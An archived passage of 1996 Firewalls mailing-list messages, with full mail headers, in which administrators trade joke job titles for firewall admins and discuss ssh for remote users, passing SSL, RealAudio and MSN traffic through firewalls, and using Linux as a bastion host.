In-Reply-To: from "John G. Thompson" at Jan 12, 96 10:09:58 am X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The mail administrator is "postmaster" > The web server admin is "webmaster" personally, Im pushing for 'Smokey', like the bear, or the cop... =-) From firewalls-owner Fri Jan 12 13:48:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA00536 for firewalls-outgoing; Fri, 12 Jan 1996 12:25:16 -0800 (PST) Received: from theory.tc.cornell.edu (THEORY.TC.CORNELL.EDU [132.236.98.174]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA00522 for ; Fri, 12 Jan 1996 12:25:10 -0800 (PST) Received: (from uactech@localhost) by theory.tc.cornell.edu (8.6.9/8.6.6) id PAA34460 for firewalls@Greatcircle.com; Fri, 12 Jan 1996 15:24:16 -0500 Received: from ovid by ithaca.actech.com (920330.SGI/SMI-4.0) id AA24955; Fri, 12 Jan 96 13:47:46 -0500 Received: by ovid.actech.com (5.x/SMI-SVR4) id AA03127; Fri, 12 Jan 1996 13:47:46 -0500 Received: from Messages.8.5.N.CUILIB.3.45.SNAP.NOT.LINKED.ovid.sun4.51 via MS.5.6.ovid.sun4_51; Fri, 12 Jan 1996 13:47:46 -0500 (EST) Message-Id: <4kxenGP6_EEC1UGPg0@ovid> Date: Fri, 12 Jan 1996 13:47:46 -0500 (EST) From: Steve Gaarder To: firewalls@Greatcircle.com Subject: Re: Encryption export laws from US... In-Reply-To: <30F54634@at3038p.kc.bv.com> References: <30F54634@at3038p.kc.bv.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Excerpts from lists.firewalls: 11-Jan-96 Re: Encryption export laws .. "Archer, Barry J."@bv.co (1155) > One of the major can'o'worms I face is how to set up secure USER to > Firewall sessions over the Internet. It's not a matter of whether or not I > like it, it's coming. > Firewall to Firewall encryption is great, but when you have nomadic > remote users and small international offices individual access gets > important for a lot of folks. The ssh program (http://www.cs.hut.fi/ssh) is a very promising candidate in this area. It's a replacement for rsh that adds encryption, cryptographic authentication, and X11 and TCP port forwarding. It's pretty cute, and has the added plus of having been developed outside the US. You can tunnel it though a firewall with plug-gw or Socks. I'm designing a setup based on it. However, you have to look at the security of your nomadic user's machine. If a user on that machine can use ssh to get past your firewall, and that machine gets compromised, you come under attack. This will get particularly interesting once the MS Windows ssh client is available - I hope I can get away with insisting on Windows NT. Steven Gaarder Network and Systems Administrator gaarder@actech.com A C Technology, Ithaca, N.Y., USA From firewalls-owner Fri Jan 12 13:59:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA05747 for firewalls-outgoing; Fri, 12 Jan 1996 13:53:04 -0800 (PST) Received: from delta.eecs.nwu.edu (delta.eecs.nwu.edu [129.105.5.103]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA05742 for ; Fri, 12 Jan 1996 13:52:55 -0800 (PST) Received: by delta.eecs.nwu.edu (8.6.12/8.6.12) id PAA22056 for firewalls@greatcircle.com; Fri, 12 Jan 1996 15:51:57 -0600 Date: Fri, 12 Jan 1996 15:51:57 -0600 From: Robert Bonomi Message-Id: <199601122151.PAA22056@delta.eecs.nwu.edu> To: firewalls@greatcircle.com Subject: Re: "Title for Firewall Admin? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk + Date: Fri, 12 Jan 1996 09:31:21 -0500 + From: Frederick M Avolio + Subject: Re: "Title for Firewall Admin? + Sender: firewalls-owner@GreatCircle.COM + Precedence: bulk + Status: R + + On the Gauntlet Firewalls that we install, the management accounts of the + firewall machine go to the firewall manager. + + But I can see, eventually, a need for a well known different term. + + Gee, another thing for the Firewall Product Developers Consortium to talk + about. :-) Quick... get famous. Suggest a standard! + + "gatekeeper" is a fun possibility. "doorman" is too plain. how about 'cerberus' -- he who guards the gateway to Hell. or, my personal favorite, 'horatio'. He stood at the _bridge_, keeping the barbarians at bay. *grin* Brent's suggestion had a strong factual basis in it's favor, however. :(( + + Fred + + At 04:04 PM 1/11/96 -0800, Bill Curr wrote: + > + >The mail administrator is "postmaster" + >The web server admin is "webmaster" + >Is there such a title for a firewall administrator? + >And is there a list of these colorful "nom de nets" anywhere? Postmaster -- mail admin webmaster -- www admin hostmaster -- DNS admin + >-Thanks + >Bill + > + > From firewalls-owner Fri Jan 12 14:08:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA26992 for firewalls-outgoing; Fri, 12 Jan 1996 11:24:15 -0800 (PST) Received: from mailx.best.com (mailx.best.com [204.156.128.56]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA26970 for ; Fri, 12 Jan 1996 11:24:06 -0800 (PST) Received: from shellx.best.com (shellx.best.com [206.86.0.11]) by mailx.best.com (950911.SGI.8.6.12.PATCH825/8.6.5) with ESMTP id TAA14094 for ; Fri, 12 Jan 1996 19:25:16 GMT Received: from yobie.vip.best.com (yobie.vip.best.com [204.156.155.53]) by shellx.best.com (950911.SGI.8.6.12.PATCH825/8.6.5) with SMTP id LAA03993 for ; Fri, 12 Jan 1996 11:23:09 -0800 Message-ID: <30F5633B.619B@yobie.com> Date: Thu, 11 Jan 1996 11:21:31 -0800 From: Yobie Benjamin Organization: MetaGenesis, INc. X-Mailer: Mozilla 2.0b5 (Win95; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Re: "Title for Firewall Admin? References: <2.2.16.19960112143121.3f9720e2@gauntlet-1.trusted.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk How about concierge du net? 8-) Frederick M Avolio wrote: > > On the Gauntlet Firewalls that we install, the management accounts of the > firewall machine go to the firewall manager. > > But I can see, eventually, a need for a well known different term. > > Gee, another thing for the Firewall Product Developers Consortium to talk > about. :-) Quick... get famous. Suggest a standard! > > "gatekeeper" is a fun possibility. "doorman" is too plain. > > Fred > > At 04:04 PM 1/11/96 -0800, Bill Curr wrote: > > > >The mail administrator is "postmaster" > >The web server admin is "webmaster" > >Is there such a title for a firewall administrator? > >And is there a list of these colorful "nom de nets" anywhere? > >-Thanks > >Bill > > > > -- Yobie Benjamin yobie@yobie.com 102262.2260@compuserve.com yobie@best.com -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 mQINAzBWg18AAAEQANnXKRohQlsdi+E2pVGH9/0ljIJFwg6TCQQ37Lcv8LfIR1RP FbwXDfMAWtRKQkYtHUa18png/qMlDJeaethHDaotRMuhUtDpvWxLH7HmWyJ6sz78 ZHN3/ddtLrzrb+fYgjXhBnkSckmxwNQ8o1k4E45UvWGL2BzldVeOKmmBHjI8hgxX lgPAw+Ozl2JESYvRjj3OT1jHFGlri/Hzvd/D7kbkhF6eMcCotX1h6ZcoTUka5qqh PzKr04zCzQrw0z/Qy5St1gA2gB40mwsxICnrLo7y0fXilFT0qtQI+bj2pV2rfPhe KQYXLHuL3Hrv8vUhciPtNrS3iPESTsIeADZ3r+0g6RJ1XDkZ1P9iaM4S6TRjugw1 CmBaj9rpkJ79MV235n3a0q6ZlWMzhPJ5yz+kt2UdBMeeWXT5eV+AB0tfgYUt9Mss G8/h+m8FypdxKlEs/9e3PtROmoIm2OXKUEFzY9Cl6Ew0nisCXyPYtuRRrC7w6EWR oj5WItiIdZvbN9GmTJ5seBA2TwAxKcDw7LEieaItCcUsG955jbagOaptBOPSUrv8 LJA40PIPgXpXP+SEJiL9wJQ5TGvkAsZkw+X9z26c9chImPy5A7qCZy3R/XZYu0Hc OCd2zQnjzw87LKfIhJ3LDHMZADBdLvVdFfCd4EihjldGdzGzoQJ1FGhpIpSRAAUT tCBZb2JpZSBCZW5qYW1pbiA8eW9iaWVAeW9iaWUuY29tPg== =9HBa -----END PGP PUBLIC KEY BLOCK----- From firewalls-owner Fri Jan 12 14:14:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA05612 for firewalls-outgoing; Fri, 12 Jan 1996 13:50:06 -0800 (PST) Received: from gw1.octel.com (gw1.octel.com [148.147.1.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA05577 for ; Fri, 12 Jan 1996 13:49:43 -0800 (PST) Received: (from daemon@localhost) by gw1.octel.com (8.6.10/8.6.12) id NAA24118; Fri, 12 Jan 1996 13:48:41 -0800 Received: from curly.eng.octel.com(148.147.200.26) by gw1.octel.com via smap (V1.3) id sma024100; Fri Jan 12 13:48:23 1996 Received: from nts-hbo (nts-hbo.corp.octel.com [148.147.58.8]) by curly.eng.octel.com (8.6.12/8.6.12) with SMTP id NAA05841; Fri, 12 Jan 1996 13:48:23 -0800 Message-ID: <30F6D6E1.5EA0@octel.com> Date: Fri, 12 Jan 1996 13:47:13 -0800 From: Howard Owen Organization: Octel Communications Corporation X-Mailer: Mozilla 2.0b5 (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM CC: Mike Gogulski Subject: Re: "Title for Firewall Admin? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mike Gogulski wrote: > > Frederick M Avolio wrote: > > > > "gatekeeper" is a fun possibility. "doorman" is too plain. > > > > Ah, then we'll have to call hacker's "keymasters" in keeping with the > Ghostbusters theme... No, that sounds too much like a krypto key keeper. I like "gatekeeper". It's got some history behind it. Or, we could borrow from the NSA and go with "dockmaster". I also like "scapegoat". More along that line: Real World PC Version Roadblock Conveyance Check Fall Guy Fall Person Whipping Boy Self-esteem Enhanced Juvenile Characteristics of a gatekeeper: Paranoid Caring Obsessive Detail Oriented Anally Retentive Differently Excreting Have a really nice day. 8-) -- Howard Owen hbo@octel.com Octel Communications Corporation 1024/DC671C31 = Internet Guy/Webmaster 1001 Murphy Ranch Rd. 37 A0 46 EE BE 408-324-6576 Voice and FAX Milpitas CA 95035-7912 95 DB 92 E8 39 I am not a pay TV service! http://www.egbok.com/hbo.html 80 89 A9 F9 3D FB From firewalls-owner Fri Jan 12 14:29:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA05225 for firewalls-outgoing; Fri, 12 Jan 1996 13:45:08 -0800 (PST) Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id NAA05173 for ; Fri, 12 Jan 1996 13:44:47 -0800 (PST) Received: (from nobody@localhost) by tera.bctel.net (8.7.1/8.7.1) id NAA24654; Fri, 12 Jan 1996 13:43:37 -0800 (PST) X-Authentication-Warning: tera.bctel.net: nobody set sender to using -f Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma024651; Fri Jan 12 13:43:23 1996 Received: (from murrell@localhost) by mocha.bctel.net (8.7.1/8.7.1) id NAA22353; Fri, 12 Jan 1996 13:43:33 -0800 (PST) Date: Fri, 12 Jan 1996 13:43:33 -0800 (PST) From: Brian Murrell Message-Id: <199601122143.NAA22353@mocha.bctel.net> To: murrell@bctel.net, firewalls@greatcircle.com, ken@bridge.com Subject: Re: Firewalls-Digest V5 #14 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-MD5: 83/aS9KLWs8Kqgxxz1a2Og== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Has anyone reverse-enginneered the R/A protocol, or deciphered F/W-1's > enhancement (http://www.checkpoint.com/realaudio.html) enough to > determine how it can be "safely" supported? And is the protocol > proxyable (can know about a gateway), or will it only ever work with a > filtering router or transparent proxy? I started to, but didn't find it interesting enough to continue. I just wanted to ensure that they implemented it correctly and not just opening up the suggested range to let it through. The protcol should be proxyable. If FW-1 can figure out the src/destination addresses/ports so can a proxy. It would be more like a plug than a proxy (meaning it couldn't actually check the payload of the audio stream) however. b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5261 From firewalls-owner Fri Jan 12 14:42:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA04953 for firewalls-outgoing; Fri, 12 Jan 1996 13:41:33 -0800 (PST) Received: from bchnetgw.bchydro.bc.ca (bchnetgw.BCHydro.BC.CA [142.52.88.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA04948 for ; Fri, 12 Jan 1996 13:41:20 -0800 (PST) Received: by bchnetgw.bchydro.bc.ca (4.1/SMI-4.1) id AA28032; Fri, 12 Jan 96 13:40:05 PST Received: from bchgate.bchydro.bc.ca by bchnetgw via smap (V1.3mjr) id sma028019; Fri Jan 12 13:39:58 1996 Received: by BCHydro.bc.ca (4.1/SMI-4.1) id AA00171; Fri, 12 Jan 96 13:39:43 PST Received: from unknown by bchgate via smap (V1.3mjr) id sma000119; Fri Jan 12 13:39:11 1996 Received: by (5.x/SMI-SVR4) id AA15807; Fri, 12 Jan 1996 13:39:06 -0800 Date: Fri, 12 Jan 1996 13:39:06 -0800 From: David.Tsai@BCHydro.bc.ca (David Tsai) Message-Id: <9601122139.AA15807@> To: firewalls@greatcircle.com Subject: Re: "Title for Firewall Admin? X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > > The mail administrator is "postmaster" > > The web server admin is "webmaster" > > Is there such a title for a firewall administrator? > > Firemaster? > How about 'wallmaster'? -- David Tsai phone: (604) 623-4301 BC Hydro, Vancouver, Canada pager: (604) 686-1914 david.tsai@bchydro.bc.ca or dtsai@bchspd.wimsey.com From firewalls-owner Fri Jan 12 14:44:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA08873 for firewalls-outgoing; Fri, 12 Jan 1996 14:29:08 -0800 (PST) Received: from gw1.att.com (gw1.att.com [192.20.239.133]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA08866 for ; Fri, 12 Jan 1996 14:29:03 -0800 (PST) Received: from vodka.sse.att.com (vodka.gc.att.com) by ig1.att.att.com id AA04472; Fri, 12 Jan 96 17:25:56 EST Message-Id: <9601122225.AA04472@ig1.att.att.com> From: mdr@vodka.sse.att.com Subject: Re: "Title for Firewall Admin? To: CRISALLT@ADMIN.GMCC.AB.CA (Tim Crisall) Date: Fri, 12 Jan 1996 17:28:32 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: from "Tim Crisall" at Jan 12, 96 12:18:32 pm X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In support of the firewall admin's true responsibility: Security Administrator Network Security Administrator Others that are more colorful: SecMaster HackerBlaster NetMaster InternetOverlord PacketPasser PacketMaster BastionBrigadier DataDictator OutwitMitnick What I really want His supreme lordship, protector of the Corporate LAN. Mark Riggins Secure Systems Engineering AT&T Bell Labs PS: Sorry couldn't help myself From firewalls-owner Fri Jan 12 14:57:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA03055 for firewalls-outgoing; Fri, 12 Jan 1996 13:09:24 -0800 (PST) Received: from relay.ashton.csc.com (relay.ashton.csc.com [20.2.54.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA03044 for ; Fri, 12 Jan 1996 13:09:12 -0800 (PST) Received: by relay.ashton.csc.com; id QAA16853; Fri, 12 Jan 1996 16:07:57 -0500 Received: from mccoy.ashton.csc.com(20.2.51.2) by relay.ashton.csc.com via smap (g3.0.1) id sma016849; Fri, 12 Jan 96 16:07:47 -0500 Received: (from ckostick@localhost) by mccoy.ashton.csc.com (8.6.9/8.6.9) id QAA01334; Fri, 12 Jan 1996 16:23:12 -0500 From: Chris Kostick Message-Id: <199601122123.QAA01334@mccoy.ashton.csc.com> Subject: Re: Linux as a firewall To: dana@nav.cc.tx.us (Dana Brewer) Date: Fri, 12 Jan 1996 16:23:12 -0500 (EST) Cc: firewalls@greatcircle.com In-Reply-To: from "Dana Brewer" at Jan 12, 96 10:20:14 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I've noticed that a lot of people say they use Linux as part of their > Internet firewall. But now I've had a company tell me that Linux isn't a > true multi-tasking operating system, so it shouldn't be used as a > firewall. What's the true story here? Ideally, in our situation, the > bastion host would be the firewall, the WWW server, the ftp server, the > Usenet news server, etc... Is this completely unrealistic? Linux is as multitasking as any other UNIX system so whomever you talked to, don't take advice from them again. Linux can be used as a firewall. Depending on what you like it can do just filtering, can be a socks based firewall, or you can run fwtk. It can run as a server for any of the services you mentioned. Linux has many drawbacks for being a firewall machine however. It takes a lot of work to get it 'just the way you want it'. It is not out of the box and it is not commercially supported. For the many organizations that need firewalls, they don't have the time for roll your own solutions. Linux also has an up and down life cycle. Sometimes the community will develop support for the latest technologies and Linux will be ahead of other OSs, and other times the vendors will have technology not yet incorporated into Linux. It's an interesting solution for some people and totally unacceptable for others. But having Linux for firewall support absolutely realistic. -- chris From firewalls-owner Fri Jan 12 14:59:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA10860 for firewalls-outgoing; Fri, 12 Jan 1996 14:49:10 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA10855 for ; Fri, 12 Jan 1996 14:49:04 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id QAA19237; Fri, 12 Jan 1996 16:47:44 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id QAA19229; Fri, 12 Jan 1996 16:47:43 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id QAA23040; Fri, 12 Jan 1996 16:48:18 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id QAA14497; Fri, 12 Jan 1996 16:48:20 -0600 Date: Fri, 12 Jan 1996 16:48:20 -0600 From: Rick Smith Message-Id: <199601122248.QAA14497@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, pf26376@ci.deere.com Subject: Re: Allow SSL through a firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The problem I see with the proposed configuration is that the firewall can't/won't be able to apply any protection against attacks on incoming SSL connections. If the SSL application is breached due to a flaw in the server software (like what happened with ncsa httpd, syslog, etc, etc) then the attacker is on a machine *INSIDE* your security perimeter. Another problem is that SSL (as usually implemented for supporting https) can only authenticate the server (which you already trust) and tells you nothing about the client. If SSL gave you client authentication data (which it doesn't) then the firewall could screen incoming SSL connections and only allow those from trustworthy sources. Instead, the server software has to go through a bunch of SSL transactions and then a bunch of http transactions via some series of web pages before you can tell if the client connection comes from someone you trust. If the connection comes from an attacker, he's had lots of time exchanging protocol with your server, and can exploit any bugs that may exist in the protocol software he uses. Rick. smith@sctc.com secure computing corporation From firewalls-owner Fri Jan 12 15:08:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA27708 for firewalls-outgoing; Fri, 12 Jan 1996 11:38:26 -0800 (PST) Received: from chrivb01.cch.com (chrivb01.cch.com [199.14.11.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA27703 for ; Fri, 12 Jan 1996 11:38:22 -0800 (PST) Received: by chrivb01.cch.com id AA29365; Fri, 12 Jan 96 13:37:14 CST Received: from mailhub.cch.com(165.181.21.17) by chrivb01 via smap (V1.3mjr) id sma029322; Fri Jan 12 13:37:00 1996 Received: by notes.cch.com (IBM OS/2 SENDMAIL VERSION 1.3.14/1.0) id AA0516; Fri, 12 Jan 96 13:38:30 -0600 Message-Id: <9601121938.AA0516@notes.cch.com> Received: from Computax with "Lotus Notes Mail Gateway for SMTP" id 91CA156EBE852890862562AF00684E06; Fri, 12 Jan 96 13:38:30 To: firewalls From: "Richard Giering Jr." Date: 12 Jan 96 13:09:53 Subject: Re: MSN proxy? Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I guess I wasn't clear. Here's the message I received from one of our guys. >>MSN is opening up direct access to their data center. >>If possible I would like to access them using our Internet connection. >>There are some issues about how the traffic will make it through our firewall. >>Here is a response I received from them: >>It means that the protocol that MSN uses (called MPC) over >>TCP/IP must not be blocked by your firewall. If you have a >>filtering router on your LAN (it just blocks certain IP port numbers) >>you should be fine as long as messages to port 569 >>can get through. >> >>If your firewall is a proxy, it may attempt to understand the >>protocol. In this case, it will probably not forward MPC >>packets. >> >>I believe our firewall is a proxy. Any thoughts? I've asked if the port is TCP or UDP and if Netbios is required (how else is it going to find it?). No response to date. I want a proxy to both understand what's happening and control any information being delivered to MSN. One mailing list a while back indicated that information like files, directories and other PC's on the same net were still being sent to MSN across dial-up links. Rick Giering (Firewall Ranger) CCH. Inc ================== Forwarded Message Follows ==================== From: aroussos @ lia.co.za ("Dr. Angelo Roussos") @ Internet Date: 01/12/96 09:20:29 AM Subject: Re: MSN proxy? Hi, The microsoft network is at: www.msn.com. -------------------------------------------------------------------- Dr. Angelo Roussos Tel: +27(11)455-3945 Department of Anaesthesia University of the Witwatersrand Medical School Parktown, 2196 Johannesburg, Gauteng South Africa Director, Infoline/LIA Internet Access and Networking Tel: +27(11)315-3476 -------------------------------------------------------------------- From firewalls-owner Fri Jan 12 15:14:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA11903 for firewalls-outgoing; Fri, 12 Jan 1996 15:03:13 -0800 (PST) Received: from toolbox.rutgers.edu (toolbox.rutgers.edu [128.6.134.37]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA11872 for ; Fri, 12 Jan 1996 15:03:02 -0800 (PST) Received: (from binde@localhost) by toolbox.rutgers.edu (8.6.12+bestmx+oldruq+newsunq/8.6.12) id RAA06281; Fri, 12 Jan 1996 17:58:43 -0500 From: "Beth Binde" Message-Id: <9601121758.ZM6279@toolbox.rutgers.edu> Date: Fri, 12 Jan 1996 17:58:42 -0500 In-Reply-To: mdr@vodka.sse.att.com "Re: "Title for Firewall Admin?" (Jan 12, 17:28) References: <9601122225.AA04472@ig1.att.att.com> X-Mailer: Z-Mail (3.2.1 15feb95) To: mdr@vodka.sse.att.com, CRISALLT@ADMIN.GMCC.AB.CA (Tim Crisall) Subject: Re: "Title for Firewall Admin? Cc: firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Systems Goddess. It says it all. -- Beth E. Binde, Systems Programmer, Instructional Computing Initiative Rutgers University Computing Services, Piscataway, NJ 08855-0879 USA EMAIL: binde@nbcs.rutgers.edu VOICE: 908-445-5019 FAX: 908-445-2021 PGP Fingerprint: 40 5B 70 D3 75 27 08 D6 44 58 C3 62 57 E9 CA A2 From firewalls-owner Fri Jan 12 15:44:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA12896 for firewalls-outgoing; Fri, 12 Jan 1996 15:21:46 -0800 (PST) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA12878 for ; Fri, 12 Jan 1996 15:21:19 -0800 (PST) Received: from mnbp.network.com (ushub.network.com) by nsco.network.com (4.1/1.34) id AA10490; Fri, 12 Jan 96 17:22:30 CST Received: by mnbp.network.com with Microsoft Mail id <30F6EC79@mnbp.network.com>; Fri, 12 Jan 96 17:19:21 CST From: Greg Brennan To: firewalls mailing list Subject: FW: "Title for Firewall Admin? Date: Fri, 12 Jan 96 17:16:00 CST Message-Id: <30F6EC79@mnbp.network.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Phil Howard writes: >No idea. I just thought up: "netsentry" Thanks Phil. NetSentry(TM) is the name of the firewall that runs on Network Systems Corp (NSC) secure routers. We liked it too!! Greg Brennan Network Systems Corp. ---------- From: firewalls-owner To: billcurr Cc: firewalls Subject: Re: "Title for Firewall Admin? Date: January 12, 1996 09:34AM Bill Curr writes... > The mail administrator is "postmaster" > The web server admin is "webmaster" > Is there such a title for a firewall administrator? > And is there a list of these colorful "nom de nets" anywhere? No idea. I just thought up: "netsentry" -- Phil Howard KA9WGN +-------------------------------------------------+ Linux Consultant | The enemy of my enemy is NOT my friend... | Milepost Services | ...but he is a convenient ally! | phil@milepost.com +-------------------------------------------------+ From firewalls-owner Fri Jan 12 15:46:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA04690 for firewalls-outgoing; Fri, 12 Jan 1996 13:37:18 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA04685 for ; Fri, 12 Jan 1996 13:37:12 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-951213) id NAA09339; Fri, 12 Jan 1996 13:34:16 -0800 Received: from uuneo.neosoft.com(206.109.1.3) by mycroft via smap (V1.3mjr) id sma009327; Fri Jan 12 13:33:40 1996 Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.7.3/8.7.3) with UUCP id PAA03183 for GreatCircle.COM!Firewalls; Fri, 12 Jan 1996 15:13:40 -0600 (CST) Received: by ris1.nmti.com (smail2.5) id AA02050; 12 Jan 96 15:00:48 CST (Fri) Received: by sonic.nmti.com; id AA02105; Fri, 12 Jan 1996 14:31:58 -0600 From: peter@nmti.com (Peter da Silva) Message-Id: <9601122031.AA02105@sonic.nmti.com.nmti.com> Subject: Re: "Title for Firewall Admin? To: davek@MELITA.melita.com Date: Fri, 12 Jan 1996 14:31:58 -0600 (CST) Cc: shawn@aob.org, Firewalls@GreatCircle.COM In-Reply-To: <9601121905.AA43800@melupl.melita.com> from "Dave Kennedy" at Jan 12, 96 02:05:12 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Remember "Ghostbusters?" There was the gatekeeper and the keymaster. There is no Dana. Only Zuul. Did the Keymaster have a cool name too? I named our web/news/mail proxy Zuul. The keymaster would be a good name for our new firewall. From firewalls-owner Fri Jan 12 15:47:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA12338 for firewalls-outgoing; Fri, 12 Jan 1996 15:10:25 -0800 (PST) Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA12326 for ; Fri, 12 Jan 1996 15:10:18 -0800 (PST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id RAA19704; Fri, 12 Jan 1996 17:05:58 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id RAA19700; Fri, 12 Jan 1996 17:05:58 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id RAA23350; Fri, 12 Jan 1996 17:06:34 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id QAA27420; Fri, 12 Jan 1996 16:30:31 -0600 Date: Fri, 12 Jan 1996 16:30:31 -0600 From: Rick Smith Message-Id: <199601122230.QAA27420@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, dannyc@gmap.leeds.ac.uk Subject: Re: Firewall design - routers and commercial kit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Danny Cox asks: > Please give me some comeback here as I may be missing something. If I buy a >firewall from V-One or Secure Computing or MilkyWay or whoever I have a box >which runs proxies etc. We need to be in a position to run a WWW server, an >ftp server and some sort of server which will control ISDN/modems etc. We generally recommend that Sidewinder customers with FTP or Web data that's particularly at risk of attack host that data on a Sidewinder. That way you have the mandatory protection applied to the server, preventing access and corruption of your data. > Seems to me the obvious way (sort of) to do this is to use a screened >subnet arrangement. Ok .. fine. Am I duplicating kit doing this ? >That is, by using an exterior and interior router to create a screened >net off which would hang the commercial firewall etc, am I duplicating >the routing function of the commercial firewall or don't they have the >same level of control over routing as a CISCO would for example ? Many sites do this sort of thing, even with dual homed bastion hosts. Paranoia. I love it. If you're putting up external servers on standard Unix or NT hosts, put them *outside* the dual homed firewall, but inside relative to your outbound router. Rick. smith@sctc.com secure computing corporation From firewalls-owner Fri Jan 12 15:53:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA01308 for firewalls-outgoing; Fri, 12 Jan 1996 12:38:13 -0800 (PST) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA01303 for ; Fri, 12 Jan 1996 12:38:09 -0800 (PST) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id OAA10056; Fri, 12 Jan 1996 14:30:31 -0600 Received: from ignatz.bridge.com(167.76.24.6) by 